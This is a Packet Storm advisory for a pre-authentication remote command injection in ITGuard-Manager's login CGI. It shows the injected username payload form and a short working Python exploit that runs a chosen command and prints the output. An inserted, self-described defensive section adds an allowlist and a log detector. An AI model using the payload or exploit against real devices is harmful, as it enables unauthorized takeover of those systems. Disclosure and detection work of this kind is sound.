ITGuard-Manager 0.0.0.1 Remote Command Execution

2017-12-15T00:00:00
ID PACKETSTORM:145431
Type packetstorm
Reporter Nassim Asrir
Modified 2017-12-15T00:00:00

Description

                                        
# Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution
  
# Author: Nassim Asrir   
  
# Contact: wassline@gmail.com / @asrir_nassim  
  
# CVE: Waiting ...  
  
# CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P
  
# Vendor: http://www.innotube.com  
  
  
Details:  
========  
  
First we need to know what happens when we log in.

When a user (or attacker) submits any values in the login form, the browser sends this POST request:
  
POST /cgi-bin/drknow.cgi?req=login HTTP/1.1   
Host: server  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Referer: http://server/log-in.html?lang=KOR  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
req=login&lang=KOR&username=admin&password=admin  
  
  
Now that we have this POST request, the only parameter we care about is username: because its value is
not sanitized, system commands can be executed through it.

The payload is: admin|<command>||x, where <command> is replaced with any Unix command (ls, id, mkdir, etc.).
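The two controls a defender wants against this class of bug are an allowlist on the login field before it reaches anything that resembles a shell call, and a detection over request logs for the metacharacters the payload relies on. The following is an added example, not code from the advisory or from the vendor: the username allowlist is an assumption (ITGuard-Manager's real username rules are not documented here), and the log format it parses is constructed for illustration.

```python
"""Defender-side checks for the login command injection described above.

Added example (not part of the original advisory). The username allowlist and
the log format are assumptions constructed for illustration.
"""
import re
from urllib.parse import parse_qs

# Assumed allowlist for usernames: letters, digits and a few punctuation marks,
# at most 64 characters. It rejects every shell metacharacter ('|', quotes)
# the advisory's admin|<command>||x payload depends on.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")

# Characters a POSIX shell interprets; their presence in a login field is a
# strong detection signal.
SHELL_META = set("|;&$`<>()'\"\\\n")


def is_valid_username(username: str) -> bool:
    """Strict allowlist check a hardened login handler applies first."""
    return bool(USERNAME_RE.fullmatch(username))


def suspicious_login_fields(body: str) -> list:
    """Names of url-encoded form fields whose decoded value contains shell metacharacters."""
    fields = parse_qs(body, keep_blank_values=True)  # percent-decodes values
    flagged = []
    for name, values in fields.items():
        if any(ch in SHELL_META for v in values for ch in v):
            flagged.append(name)
    return flagged


# Constructed sample of a proxy/WAF log that records request line and POST body.
SAMPLE_LOG = [
    'POST /cgi-bin/drknow.cgi?req=login body="req=login&lang=ENG&username=admin&password=admin"',
    'POST /cgi-bin/drknow.cgi?req=login body="req=login&lang=ENG&username=admin%7Cid%7C%7Cx&password=admin"',
    'GET /log-in.html?lang=KOR body=""',
    'POST /cgi-bin/drknow.cgi?req=login body="req=login&lang=KOR&username=o%27brien&password=x"',
]

LOG_RE = re.compile(r'^(?P<method>\S+) (?P<path>\S+) body="(?P<body>[^"]*)"$')


def scan_log(lines):
    """Return (line_number, flagged_fields) for POSTs to the login CGI whose
    form fields carry shell metacharacters."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        if not m.group("path").startswith("/cgi-bin/drknow.cgi"):
            continue
        flagged = suspicious_login_fields(m.group("body"))
        if flagged:
            hits.append((n, flagged))
    return hits


if __name__ == "__main__":
    for line_no, fields in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: shell metacharacters in {fields}")
```

Note the fourth sample line: a legitimate name such as o'brien trips the metacharacter scan because quotes are in the set, so the log scan is a triage signal with some false positives, while the allowlist in the handler (which also rejects that name under this assumed rule set) is the actual preventive control.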
  
Exploit:  
=======  
  
# i am not responsible for any wrong use.

import requests

# Target base URL including the scheme, e.g. http://server
target = input('Target(With proto) : ')

# The Unix command spliced into the username parameter
command = input('Command To Execute : ')

fullpath = target + "/cgi-bin/drknow.cgi?req=login"
data = {'req': 'login',
        'lang': 'ENG',
        'username': 'admin|' + command + '||x',
        'password': 'admin'}

execute = requests.post(fullpath, data=data)

# The CGI's response contains the command output
print(execute.text)
  